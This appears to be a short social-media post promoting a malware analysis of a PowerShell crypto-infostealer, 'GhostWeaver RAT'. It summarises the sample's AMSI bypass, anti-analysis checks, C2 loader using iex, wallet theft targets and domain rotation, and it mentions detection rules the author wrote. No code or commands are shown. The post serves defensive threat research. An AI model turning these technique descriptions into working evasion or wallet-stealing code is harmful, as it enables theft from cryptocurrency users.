Malware Analysis Deep Dive: GhostWeaver RAT (PowerShell Crypto-Infostealer)

Over the past few days, I completed an in-depth analysis of a highly obfuscated PowerShell-based infostealer I’ve classified as GhostWeaver RAT.

This malware is financially motivated, stealth-focused, and clearly designed to survive modern SOC environments.

Key takeaways from the analysis:

• Heavy PowerShell obfuscation with native Windows API abuse

• AMSI bypass via in-memory protection manipulation

• Strong anti-analysis & anti-IR logic (kills execution if tools like x64dbg, Procmon, Wireshark, etc. are detected)

• Full environment awareness (WORKGROUP vs Active Directory domain)

• Modular C2-controlled loader using HTTP POST + iex execution

• Aggressive cryptocurrency wallet discovery, targeting:

– Browser wallets (MetaMask, Phantom, Trust, Coinbase, OKX, Rabby, etc.)

– Desktop wallets (Exodus, Electrum, Atomic, Monero, Sparrow, Daedalus, Bisq, more)

• Lightweight DGA-style domain rotation for C2 resilience

What makes this threat interesting isn’t nation-state sophistication — it’s efficiency:

• Speed over encryption

• Breadth over precision

• Evasion tuned specifically for analysts and sandboxes

I also developed practical detection content from the research:

✔ Splunk hunting queries

✔ YARA rules

✔ SNORT / Suricata signatures

✔ SIGMA rules

✔ Microsoft Defender / Sentinel (KQL) detections

This is a strong example of how modern crimeware borrows red-team techniques, and why behavior-based detection matters more than signatures alone.

If you work in SOC, DFIR, Threat Hunting, or Malware Research, this is the kind of threat worth studying closely.

Happy to discuss tradecraft, detection strategies, or defensive blind spots 👇

contact:

🌐 https://quantumkonetservices.tech

📞 09024676339

📧 contact@quantumkonetservices.tech

or

🌐 https://alichisom.com/

📧 contact@alichisom.com

Github link: